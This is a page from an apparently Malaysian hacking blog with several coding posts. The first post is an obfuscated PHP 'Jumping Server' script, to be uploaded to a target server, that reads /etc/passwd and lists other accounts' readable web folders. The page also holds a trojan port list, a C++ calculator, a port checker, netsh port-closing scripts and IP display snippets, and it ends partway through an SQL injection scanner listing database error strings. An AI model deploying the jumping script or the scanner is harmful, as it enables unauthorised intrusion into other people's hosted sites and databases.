Showing posts with label Coding. Show all posts
Showing posts with label Coding. Show all posts

Thursday, January 27, 2011

Jumping Server


Jumping Server..just copy n paste it to notepad..Save it as *.php
Then upload to the target box.. (mcm upload shell la).. Then don't nakal2.. ;D
------------------code------------------
<? 

 $x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72"; 
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "<font \146\x61\x63\145\075V\145rd\x61\x6ea s\x69\172\x65=\x32 \x63\x6fl\x6f\162\075Ma\162\x6fo\x6e\x3eC\x72\x65at\145d \x42\x79\040\x58\141\144\160\x72ito\170 \x2c \0620\061\x30,\040\124\141\156\x67\145r\x61\x6e\147 <\057\x66\157\156\x74\076\074b\x72\040\x2f>";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "<f\x6fnt\x20\146\x61\143\x65\x3d\126\x65\162\144a\156a \163iz\145=2\x20c\x6f\154\157\162\075\x4d\x61ro\157n\076 \x4f\x6b\054\x20L\x65\x74'\x73 B\x65g\x69n \x2e\x2e\056\x20\x3c/\x66\x6f\x6et><b\x72\x20\x2f\076";echo "\x3c\x66\x6fnt\x20f\141\143\145=\126er\144a\x6ea\x20\x73i\x7ae=\062 c\x6f\x6c\x6fr=\x54\x65al>\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\x2a\052</font\076<b\x72\x20\057\x3e";echo "\x3cb\162 /\076";echo "<\146\157\x6et\x20\x66\x61\x63\x65\x3dV\x65\162\x64a\x6e\x61 \163\151\x7a\145=\062\040c\157l\157\x72=M\141\x72\157\x6f\156\076\x54\x68an\x6bs \106\x6fr \125\x73\x69n\x67 \x54\150\x69s S\151m\160\x6c\x65\x20\124\x6f\x6f\x6c\x73.\040 \x5e_\x5e\074\057\146\157\x6et\x3e\074b\162 \x2f\076";echo "\074f\157\156t\x20\x66\141ce=V\x65rd\x61\156a\040\163\x69\172\145\x3d\062\076<\057\x66ont\x3e";echo "<f\157n\164\040f\x61\143\145\x3d\126e\162dana\040\163iz\145=\x32\x3e\074/\146\157\156t>";

?>


Monday, January 3, 2011

Trojan ports

 This is trojan port through TCP and UDP.. So beware

TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250
TCP 28 Amanda.200
TCP 31 MastersParadise.920
TCP 68 Subseven.100
TCP 142 NetTaxi.180
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 171 ATrojan.200
TCP 285 WCTrojan.100
TCP 286 WCTrojan.100
TCP 334 Backage.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 413 Coma.109
TCP 420 Breach.450
TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
TCP 623 Rtb666.160
TCP 660 Zaratustra.100
TCP 661 Noknok.800, Noknok.820
TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
TCP 667 SniperNet.210, Snipernet.220
TCP 668 Unicorn.101, Unicorn.110
TCP 680 Rtb666.160
TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
TCP 785 NetworkTerrorist.100
TCP 800 NeuroticKitten.010
TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
TCP 901 NetDevil.130, NetDevil.140
TCP 1000 DerSpaeher.200
TCP 1001 Silencer.100
TCP 1008 AutoSpy.100
TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1999 TransmissionScout.100, TransmissionScout.110
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 2001 DIRT.220, TrojanCow.100
TCP 2003 TransmissionScout.100, TransmissionScout.110
TCP 2023 RipperPro.100
TCP 2040 InfernoUploader.100
TCP 2115 Bugs.100
TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
TCP 2332 SilentSpy.202
TCP 2589 Dagger.140
TCP 2600 DigitalRootbeer.100
TCP 2989 Rat.200
TCP 3128 MastersParadise.970
TCP 3129 MastersParadise.920, MastersParadise.970
TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
TCP 3215 BlackStar.100, Ghost.230
TCP 3333 Daodan.123
TCP 3410 OptixPro.100, OptixPro.110
TCP 3456 Force.155, TerrorTrojan.100
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 3586 Snid.120, Snid.212
TCP 3700 PortalOfDoom.100
TCP 3723 Mantis.100
TCP 3800 Eclypse.100
TCP 3996 RemoteAnything.364
TCP 4000 SkyDance.220, SkyDance.229
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 4225 SilentSpy.202
TCP 4321 Bobo.100
TCP 4444 AlexTrojan.200, Crackdown.100
TCP 4488 EventHorizon.100
TCP 4523 Celine.100
TCP 4545 InternalRevise.100, RemoteRevise.150
TCP 4567 FileNail.100
TCP 4666 Mneah.100
TCP 4950 ICQTrojan.100
TCP 5005 Aladino.060
TCP 5025 Keylogger.WMRemote.100
TCP 5031 NetMetro.104
TCP 5032 NetMetro.104
TCP 5033 NetMetro.104
TCP 5050 RoxRat.100
TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
TCP 5190 MBomber.100
TCP 5277 WinShell.400
TCP 5343 WCRat.100
TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5534 TheFlu.100
TCP 5550 XTCP.200, XTCP.201
TCP 5555 Noxcape.100, Noxcape.200
TCP 5695 Assassin.100
TCP 5714 WinCrash.100
TCP 5741 WinCrash.100
TCP 5742 WinCrash.103
TCP 5802 Y3KRat.160
TCP 5810 Y3KRat.160
TCP 5838 Y3KRat.170
TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5880 Y3KRat.140
TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5883 Y3KRat.110, Y3KRat.140
TCP 5884 Y3KRat.140, Y3KRat.150
TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5886 Y3KRat.120, Y3KRat.140
TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5890 Y3KRat.140
TCP 6400 Thething.100, Thething.150
TCP 6556 AutoSpy.120, AutoSpy.122
TCP 6655 Aqua.020
TCP 6660 LameSpy.095
TCP 6666 LameRemote.100, ProjectMayhem.100
TCP 6669 Vampire.100
TCP 6670 DeepThroat.200, DeepThroat.210
TCP 6671 DeepThroat.310
TCP 6699 HostControl.101
TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
TCP 6712 Subseven.100
TCP 6713 Subseven.100
TCP 6767 NTRC.120
TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
TCP 6789 Doly.200
TCP 6796 SubSeven.214
TCP 6912 ShitHeep.100
TCP 6939 Indoctrination.100
TCP 6953 Lithium.100
TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
TCP 6970 Danton.330
TCP 7001 Freak88.100
TCP 7119 Massaker.100
TCP 7200 Massaker.110
TCP 7300 Coced.221
TCP 7301 Coced.221
TCP 7306 NetSpy.200, NetSpy.200
TCP 7410 Phoenix.190, Phoenix.200
TCP 7511 Genue.100
TCP 7609 Snid.120, Snid.212
TCP 7614 Wollf.130
TCP 7648 BlackStar.100, Ghost.230
TCP 7788 Last.2000, Matrix.200
TCP 7826 MiniOblivion.010, Oblivion.010
TCP 7887 SmallFun.110
TCP 7891 Revenger.100
TCP 7979 VagrNocker.200
TCP 7997 VagrNocker.200
TCP 8000 XConsole.100
TCP 8011 Way.240
TCP 8012 Ptakks.215, Ptakks.217
TCP 8110 LoseLove.100
TCP 8111 LoseLove.100
TCP 8301 LoseLove.100
TCP 8302 LoseLove.100
TCP 8372 NetBoy.100
TCP 8720 Connection.130
TCP 8734 AutoSpy.110
TCP 8811 Force.155
TCP 8899 Last.2000
TCP 9000 Aristotles.100
TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
TCP 9401 InCommand.100, InCommand.110, InCommand.170
TCP 9402 InCommand.100, InCommand.110
TCP 9561 CRatPro.110
TCP 9563 CRatPro.110
TCP 9580 TheefLE.100
TCP 9696 Danton.210, Ghost.230
TCP 9697 Danton.320, Danton.330, Ghost.230
TCP 9870 R3C.100
TCP 9872 PortalOfDoom.100
TCP 9873 PortalOfDoom.100
TCP 9874 PortalOfDoom.100
TCP 9875 PortalOfDoom.100
TCP 9876 Rux.100, SheepGoat.100
TCP 9877 SmallBigBrother.020
TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
TCP 9879 SmallBigBrother.020
TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
TCP 10001 DTr.130, DTr.140
TCP 10013 Amanda.200
TCP 10067 PortalOfDoom.100
TCP 10100 Gift.240
TCP 10101 NewSilencer.100
TCP 10167 PortalOfDoom.100
TCP 10528 HostControl.100, HostControl.260
TCP 10607 Coma.109
TCP 10666 Ambush.100
TCP 11011 Amanda.200
TCP 11050 HostControl.101
TCP 11051 HostControl.100, HostControl.260
TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
TCP 11225 Cyn.100, Cyn.103, Cyn.120
TCP 11306 Noknok.800, Noknok.820
TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 11991 PitfallSurprise.100
TCP 12043 Frenzy.2000
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 12346 Netbus.160, Netbus.170
TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
TCP 12389 KheSanh.210
TCP 12478 Bionet.210
TCP 12623 Buttman.090, Buttman.100
TCP 12624 Buttman.090, Buttman.100
TCP 12625 Buttman.100
TCP 12904 Akropolis.100, Rocks.100
TCP 13473 Chupacabra.100
TCP 13753 AFTP.010
TCP 14100 Eurosol.100
TCP 14194 CyberSpy.840
TCP 14286 HellDriver.100
TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14501 PCInvader.060, PCInvader.070
TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14504 PCInvader.050, PCInvader.060
TCP 15092 HostControl.100, HostControl.260
TCP 15382 SubZero.100
TCP 15432 Cyn.210
TCP 15555 ICMIBC.100
TCP 16322 LastDoor.100
TCP 16484 MoSucker.110
TCP 16661 Dfch.010
TCP 16969 Progenic.100
TCP 16982 AcidShiver.100
TCP 17300 Kuang.200
TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100
TCP 17593 AudioDoor.120
TCP 19191 BlueFire.035, BlueFire.041
TCP 19604 Metal.270
TCP 19605 Metal.270
TCP 19991 Dfch.010
TCP 20000 Millenium.100
TCP 20001 Millenium.100, PshychoFiles.180
TCP 20002 AcidKor.100, PshychoFiles.180
TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
TCP 21212 Schwindler.182
TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
TCP 21579 Breach.2001
TCP 21584 Breach.2001
TCP 21684 Intruse.134
TCP 22068 AcidShiver.110
TCP 22115 Cyn.120
TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
TCP 22223 Rux.400, Rux.500, Rux.600
TCP 22456 Bla.200, Bla.503
TCP 22457 AcidShiver.120, Bla.200, Bla.503
TCP 22784 Intruzzo.110
TCP 22845 Breach.450
TCP 22847 Breach.450
TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23032 Amanda.200
TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
TCP 23456 EvilFTP.100, VagrNocker.400
TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
TCP 23477 DonaldDick.153
TCP 24000 Infector.170
TCP 24307 Wildek.020
TCP 25386 MoonPie.220
TCP 25486 MoonPie.220
TCP 25555 FreddyK.100, FreddyK.200
TCP 25556 FreddyK.100
TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
TCP 25982 MoonPie.135, MoonPie.200
TCP 26274 Delta.050
TCP 27160 MoonPie.135, MoonPie.200
TCP 27184 Alvgus.100, Alvgus.800
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 28429 Hack'a'Tack.2000
TCP 28430 Hack'a'Tack.2000
TCP 28431 Hack'a'Tack.2000
TCP 28432 Hack'a'Tack.2000
TCP 28433 Hack'a'Tack.2000
TCP 28434 Hack'a'Tack.2000
TCP 28435 Hack'a'Tack.2000
TCP 28436 Hack'a'Tack.2000
TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 29891 Unexplained.100
TCP 30000 Infector.170
TCP 30001 Error32.100
TCP 30003 LamersDeath.100
TCP 30029 AOLTrojan.110
TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30103 NetSphere.131
TCP 30947 Intruse.134
TCP 31320 LittleWitch.400, LittleWitch.420
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
TCP 31415 Lithium.101
TCP 31416 Lithium.100, Lithium.101
TCP 31557 Xanadu.110
TCP 31631 CleptoManicos.100
TCP 31745 Buschtrommel.100, Buschtrommel.122
TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31887 BDDT.100
TCP 31889 BDDT.100
TCP 32100 ProjectNext.053
TCP 32418 AcidBattery.100
TCP 32791 Akropolis.100, Rocks.100
TCP 33291 RemoteHak.001
TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
TCP 33577 SonOfPsychward.020
TCP 34324 TelnetServer.100
TCP 34763 Infector.180, Infector.190, Infector.200
TCP 35000 Infector.190, Infector.200
TCP 35600 Subsari.140
TCP 36794 BugBear.100
TCP 37237 Mantis.020
TCP 37651 YAT.210
TCP 37653 YAT.310
TCP 40308 Subsari.140
TCP 40412 TheSpy.100
TCP 40421 MastersParadise.970
TCP 40422 MastersParadise.970
TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 41626 Shah.100
TCP 44444 Prosiak.070
TCP 45673 Akropolis.100, Rocks.100
TCP 47262 Delta.050
TCP 48006 Fragglerock.200
TCP 49683 HolzPferd.210
TCP 50000 Infector.180
TCP 50130 Enterprise.100
TCP 50766 Fore.100
TCP 51234 Cyn.210
TCP 51966 Cafeini.080, Cafeini.110
TCP 54321 PCInvader.010
TCP 57341 NetRaider.100
TCP 57922 Bionet.084
TCP 58008 Tron.100
TCP 58009 Tron.100
TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101
TCP 59345 NewFuture.100
TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101
TCP 60411 Connection.100, Connection.130
TCP 60412 Connection.130
TCP 60552 RoxRat.100
TCP 63536 InsaneNetwork.500
TCP 63878 AphexFTP.100
TCP 63879 AphexFTP.100
TCP 64969 Lithium.100
TCP 65000 Socket.100
UDP 1 SocketsDeTroie.250
UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
UDP 1130 Noknok.800, Noknok.820
UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920, MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140
UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
UDP 6953 Lithium.100
UDP 8012 Ptakks.217
UDP 10067 PortalOfDoom.100
UDP 10167 PortalOfDoom.100
UDP 10666 Ambush.100
UDP 11225 Cyn.100, Cyn.103, Cyn.120
UDP 11306 Noknok.800, Noknok.820
UDP 12389 KheSanh.210
UDP 12623 Buttman.090, Buttman.100
UDP 12625 Buttman.100
UDP 14100 Eurosol.100
UDP 23476 DonaldDick.155
UDP 26274 Delta.050
UDP 27184 Alvgus.100
UDP 28431 Hack'a'Tack.2000
UDP 28432 Hack'a'Tack.2000
UDP 28433 Hack'a'Tack.2000
UDP 28434 Hack'a'Tack.2000
UDP 28435 Hack'a'Tack.2000
UDP 28436 Hack'a'Tack.2000
UDP 29891 Unexplained.100
UDP 30103 NetSphere.131
UDP 31320 LittleWitch.400, LittleWitch.420
UDP 31337 BackOrifice.120, OPC.200
UDP 31416 Lithium.100, Lithium.101
UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 33333 Blackharaz.100
UDP 47262 Delta.050
UDP 49683 HolzPferd.210
UDP 60000 MiniBacklash.100


Monday, December 27, 2010

Calculator (C++)

#include "stdafx.h"
#include <iostream>
using namespace std;

void plus();
void minus(); 
void mult();     //Here are the declerations of the functions.
void dev();
void exit();


int main()
{
    int sth=0;
   
    while(1) //The while loop,will execute again and again the stuff below(but only code which is in it's scopes!)
    {
      cout << "Press 1 for Addition" << endl;
      cout << "Press 2 for Subtraction" << endl ;    //Here are the senteces about calculations..
      cout << "Press 3 for Multiplication" << endl;
      cout << "Press 4 for Devision" << endl ;
     


int choice;
    cin >> choice;
   
   
    switch (choice) //The switch statement,is like the if statement.It will run the cases below.
    {
   
case 1:
    choice = 1;
        cout << "->Addition\n";
                plus();
                    break;
   
   
   
case 2:
    choice = 2;
        cout << "->Subtraction\n";  
                minus();
                    break;



case 3:
    choice = 3;
        cout << "->Multiplication\n";  
                mult();
                    break;                   
   
   
   
   
case 4:
    choice = 4;
        cout << "->Devision\n";
                dev();
                    break;


}
continue; //Here the loop will stop and run again from the beginning.

}
       
    char f;
    cin >> f;
    return 0;

}


void plus()  //Here are the function's definitions.
{
    int my[2]; //The array here,will make 2 new integer variables,for later use.

    cout << "Put 1st number:  ";
   
    cin >> my[0]; //Int the 1st array here will be put the 1st number.
   
    cout << "Put 2nd number:  "  ;
   
    cout << endl;

    cin >> my[1]; //And here the 2nd.

    cout << "The result is : ";
   
    cout << my[0] + my[1] << endl; //This will print out the result.
   
    exit(); //And at the end the "exit" function will be called!

}

void minus()
{
   
    int my[2];

    cout << "Put 1st number:  ";
   
    cin >> my[0];
   
    cout << "Put 2nd number:  " << endl ;
   
    cin >> my[1];
   
    cout << "The difference is : ";
   
    cout << my[0] - my[1]<< endl ;

    exit();

}

void mult()
{
    int my[2];

    cout << "Put 1st number:  ";
   
    cin >> my[0];
   
    cout << "Put 2nd number:  " << endl ;
   
    cin >> my[1];
   
    cout << "The product is : ";
   
    cout << my[0] * my[1] << endl ;

    exit();

}

void dev()
{
    int my[2];

    cout << "Put 1st number:  ";
   
    cin >> my[0];
   
    cout << "Put 2nd number:  " << endl ;
   
    cin >> my[1];
   
    cout << "The quotient is : ";
   
    cout << my[0] / my[1] << endl;
   
    exit();

}                                                                           

void exit()
{
    cout << "                                                      Press 0 to Exit" << endl ;
   
    int quit;
            cin >> quit;
            if (quit == 0)
            {
            exit(0);
            }
 
}


Check open port (php)

 Hmm simply save it *.php
It will check n display opened ports

<html><head><title>Check Open Ports</title></head>
<body>
<center>
<br><br>
<h1>You IP is:<br><font color='blue'><?php echo $_SERVER['REMOTE_ADDR'];?></font></h1>
<br>
<form action="" method="post">
<h2>Enter ip adress to check: <h2><br><input type="text" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR'];?>" size="30"/><br><br>
<h2>Enter port to check: <h2><br><input type="text" name="port" size="20"/><br><br>
<input type="submit" value="check"/>
</form> 
</center>


<?php
$ip=$_POST["ip"];

$port = $_POST["port"];
if ($ip && $port){
$fp = @fsockopen($ip,$port,$errno,$errstr,5);
if(!$fp)
{
echo " <center><h3>Destination IP is <br><font color='blue'>".$ip."</font><br>Cannot connect to server  <br> Port <font color='red'>".$port." </font>is<br><h2> <b><font color='red'>Closed</b></h2></h3></center>";
}

else{
echo "<center><h3>Destination IP is <br><font color='blue'>".$ip."</font><br>Connect was successful <br> Port <font color='green'>".$port." </font> is<br><h2> <b><font color='green'>Open</b></h2></h3></center>";
fclose($fp);
}
}

?>
</body></html>


Sunday, December 26, 2010

How to close open port

So i've been looking for a while on just how to close a port on a computer. I simply
couldn't find a way. Well, i finally found it. This'll only work for windows users (unless
your unix version OS has netsh).
it's actually quite simple. here's the command for it:
netsh firewall delete portopening TCP portnumber

it's that simple. Simply go to START -> RUN -> and type in that command up there,
and it'll close it for you.
or, you can also open up command prompt (START -> RUN -> CMD) and type in "netsh"
without the quotes to get to your windows firewall settings.
however, since i'm such a nice guy, i wrote it all out in a vbs script for you so that it's
automatically runable. as well as a batch script. so here you are fellas:

.VBS Script
set ss = createobject("wscript.shell")
set ws = wscript
dim PORT
PORT = InputBox("Enter the port you wish to close:")
ss.run "netsh.exe"
ws.sleep 1000
ss.sendkeys "firewall delete portopening TCP " & PORT
ss.sendkeys "{enter}"
ws.sleep 500
'ss.sendkeys "exit"
'ss.sendkeys "{enter}"



.BAT Script
@echo off
title Port Closer
echo Port Closer
echo.
set /p port=Type the port number you wish to close here:
netsh firewall delete portopening TCP %port%
msg /w * Port %port% has been closed.
exit


Sunday, December 19, 2010

Way to show your IP address

To Get And Show The Ip Via Javascript

To show the ip via JavaScript
var ip= '<!--#echo var="REMOTE_ADDR"-->';
document.write("Your IP Address is :"+ip+" ");

To show IP via ASP
request.ServerVariables("REMOTE_ADDR")


TO SHOW IP VIA PHP
<?
$remote_address = getenv("REMOTE_ADDR");
echo "Your IP address is $remote_address.";
$browser_type = getenv("HTTP_USER_AGENT");
echo "You are using $browser_type.";
?>


Friday, December 10, 2010

SQLi scanner by country

  1. <?php
  2.    
  3.    
  4.     set_time_limit(0);
  5.    
  6.     $vuln = 0;
  7.     $not_vuln = 0;
  8.     $total = 0;
  9.    
  10.     $country = array('AF','AL','DZ','AS','AD','AO','AI','aku','AG','AR','AM','AW','AU',
  11.                     'AT','AZ','BS','BH','BD','BB','BY','BE','BZ','BJ','BM','BT','BO','BA','BW','BV','BR','IO','BN','BG','BF','BI',
  12.                     'KH','CM','CA','CV','KY','CF','TD','CL','CN','CX','CC','CO','KM','CG','CD','CK','CR','CI','HR','CY','CZ','DK',
  13.                     'DJ','DM','DO','TL','EC','EG','SV','GQ','ER','EE','ET','FK','FO','FJ','FI','FR','GF','PF','TF','GA','GM','GE',
  14.                     'DE','GH','GI','GR','GL','GD','GP','GU','GT','GN','GW','GY','HT','HM','HN','HK','HU','IS','IN','ID','IQ','IE',
  15.                     'IL','IT','JM','JP','JO','KZ','KE','KI','KW','KG','LA','LV','LB','LS','LR','LY','LI','LT','LU','MO','MK','MG',
  16.                     'MW','MY','MV','ML','MT','MH','MQ','MR','MU','YT','MX','FM','MD','MC','MN','MS','MA','MZ','NA','NR','NP','NL',
  17.                     'AN','NC','NZ','NI','NE','NG','NU','NF','MP','NO','OM','PK','PW','PS','PA','PG','PY','PE','PH','PN','PL','PT',
  18.                     'PR','QA','RE','RO','RU','RW','KN','LC','VC','WS','SM','ST','SA','SN','CS','SC','SL','SG','SK','SI','SB','SO',
  19.                     'ZA','GS','KR','ES','LK','SH','PM','SR','SJ','SZ','SE','CH','TW','TJ','TZ','TH','TG','TK','TO','TT','TN','TR',
  20.                     'TM','TC','TV','UG','UA','AE','GB','US','UM','UY','UZ','VU','VA','VE','VN','VG','VI','WF','EH','YE','ZM','ZW');
  21.    
  22.     $bug = array(
  23.         'You have an error in your SQL','Division by zero in',
  24.         'supplied argument is not a valid MySQL result resource in',
  25.         'Call to a member function','Microsoft JET Database',
  26.         'ODBC Microsoft Access Driver',
  27.         'Microsoft OLE DB Provider for SQL Server',
  28.         'Unclosed quotation mark',
  29.         'Microsoft OLE DB Provider for Oracle',
  30.         'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
  31.         'Incorrect syntax near'
  32.     );
